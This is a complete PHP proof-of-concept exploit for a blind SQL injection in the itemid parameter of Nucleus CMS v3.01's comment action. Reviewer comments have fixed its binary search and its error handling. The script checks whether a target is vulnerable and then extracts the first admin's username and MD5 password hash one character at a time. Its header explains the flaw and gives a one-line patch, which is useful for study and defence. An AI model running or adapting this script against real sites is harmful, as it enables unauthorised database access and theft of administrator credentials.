Nucleus CMS v3.01 SQL注入概念验证源代码(概念版)



#!/usr/bin/php

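<?php

// Nucleus CMS v3.01 addcomment/itemid SQL Injection Proof of Concept
// By aCiDBiTS           acidbits@hotmail.com           24-July-2004
//
// Nucleus CMS (http://nucleuscms.org) is a weblog php+mysql application.
//
// This Proof of Concept dumps the username and MD5(password) of the admin
// user placed at first position of the members table. It first checks that
// "union select" works (i.e. the bug is not patched), then that the first
// member is an admin, and then extracts both fields one character at a time
// through the blind boolean oracle in test_cond().
//
// Usage (in my debian box):
// php4 -q nuc_addc_poc.php URL
//
// Vulnerability description
//
// In action.php, function addcomment, there is no user input sanitisation
// for the parameter itemid. In line 65:
// $blogid = getBlogIDFromItemID($post['itemid']);
// This allows SQL to be injected to read data from the database.
//
// Solution
//
// Modify line 65 with:
// $blogid = getBlogIDFromItemID(intval($post['itemid']));
//
// NOTE(review): the short open tag "<?" of the original was replaced by
// "<?php" so the script also runs where short_open_tag is off, and the
// garbled "/n" escapes were restored to "\n". Only run this against an
// installation you are authorised to test.

echo "+-------------------------------------------------------------------+\n"
   . "| Nucleus CMS v3.01 addcoment/itemid SQL Injection Proof of Concept |\n"
   . "| By aCiDBiTS           acidbits@hotmail.com           24-July-2004 |\n"
   . "+-------------------------------------------------------------------+\n\n";

if ($argc < 2) {
    die("Usage: " . $argv[0] . " URL\n\n");
}

// Base URL of the target; send_post() appends "action.php", so make sure the
// value ends with a slash.
$host = $argv[1];
if (substr($host, -1) != '/') {
    $host .= '/';
}

// A working oracle must answer true for "1" and false for "0"; anything else
// means the union is rejected (patched target, different table layout, ...).
echo "Checking if vulnerable and \"union select\" works ... ";
if (test_cond("1") && !test_cond("0")) {
    echo "OK!\n";
} else {
    die("It doesn't :-(\n\n");
}

// The injected WHERE clause already contains "madmin and mnumber=1", so this
// probe is the same as the first one above; it is kept for the original
// output sequence.
echo "Checking if first member of table is admin ... ";
if (test_cond("1")) {
    echo "OK!\n";
} else {
    die("It's not :-(\n\n");
}

echo "\nGetting username: ";
get_field("mname");
echo "\nGetting MD5(password): ";
get_field("mpassword");

die("\n\nDone!\n\n");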


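/**
 * Extract one column of the first admin member, character by character.
 *
 * Every character is recovered with a binary search over $charset, asking the
 * blind oracle test_cond() "is ord(substring(FIELD, idx, 1)) equal to / less
 * than this candidate?". Each character is echoed as soon as it is found.
 * The function returns once the next position is empty (MySQL ord('') is 0,
 * so the bare ord(...) condition becomes false) and dies if a character
 * outside $charset is met.
 *
 * Changes from the original PoC: the midpoint is now an integer (the old
 * float midpoint only terminated through float rounding, costing dozens of
 * extra requests for an unknown character), the lower bound advances past
 * a rejected candidate so the search cannot stall, and the missing "Q" was
 * added to the candidate list.
 *
 * @param string $field  Column of nucleus_member to read, e.g. "mname".
 *                       It is interpolated into the injected SQL unescaped,
 *                       so only pass trusted, hard-coded names.
 * @return void
 */
function get_field($field)
{
    // Must stay in ascending ord() order for the binary search below.
    $charset = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
    $count = strlen($charset);
    $idx = 1; // MySQL substring() positions are 1-based

    while (true) {
        $probe = "ord(substring($field,$idx,1))";
        $lo = 0;
        $hi = $count; // half-open candidate range [$lo, $hi)
        $found = false;

        while ($lo < $hi) {
            $mid = $lo + (int) (($hi - $lo) / 2);
            $code = ord(substr($charset, $mid, 1));
            if (test_cond($probe . "=" . $code)) {
                echo substr($charset, $mid, 1);
                $found = true;
                break;
            }
            if (test_cond($probe . "<" . $code)) {
                $hi = $mid;
            } else {
                $lo = $mid + 1;
            }
        }

        if (!$found) {
            // Character not in $charset (or the oracle is lying): give up
            // rather than loop forever.
            die("\n\nUnexpected error!\n\n");
        }

        $idx++;
        // ord() of an empty substring is 0 in MySQL, i.e. the condition is
        // false once we have run past the end of the value.
        if (!test_cond("ord(substring($field,$idx,1))")) {
            return;
        }
    }
}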


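/**
 * Blind boolean oracle: ask the target whether the SQL expression $cond holds.
 *
 * $cond is appended to the injected WHERE clause, so it is evaluated against
 * the first admin row of nucleus_member ("madmin and mnumber=1 and $cond").
 * The answer is derived purely from whether the response mentions
 * "nucleus_ban": the original PoC treats that string as "no row matched",
 * i.e. condition false. That mapping is inherited from the original author
 * and is not verified here — confirm it against the target before trusting
 * extracted data.
 *
 * @param string $cond  SQL boolean expression; URL-encoded before sending.
 * @return bool  true when the response does not contain "nucleus_ban".
 */
function test_cond($cond)
{
    $payload = "action=addcomment"
        . "&url=index.php%3Fitemid%3D1"
        . "&itemid=1+and+0+union+select+1+from+nucleus_member+where+madmin+and+mnumber=1+and+"
        . urlencode($cond)
        . "&body=a&user=a&userid=";

    $res = send_post($payload);
    if ($res === false) {
        // A failed transfer must not be read as "condition true".
        die("\n\nNo response from target\n\n");
    }

    // stristr() replaces the removed eregi(): the same case-insensitive
    // substring test, available from PHP 4 through PHP 8.
    return stristr($res, "nucleus_ban") === false;
}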

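/**
 * POST $data (an already URL-encoded query string) to $host . "action.php"
 * and return the response body without headers.
 *
 * Reads the global $host set by the script prologue (which guarantees the
 * trailing slash). Dies with the cURL error when the transfer fails so that
 * a network problem is never silently turned into an empty body — the
 * original returned false in that case, which test_cond() would have read
 * as "condition true".
 *
 * @param string $data  Raw POST body.
 * @return string  Response body.
 */
function send_post($data)
{
    global $host;

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $host . "action.php");
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    // Bound the wait so a hung target cannot stall the character loop.
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);

    $body = curl_exec($ch);
    if ($body === false) {
        $err = curl_error($ch);
        curl_close($ch);
        die("\n\nHTTP request failed: " . $err . "\n\n");
    }
    curl_close($ch);

    return $body;
}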

?>
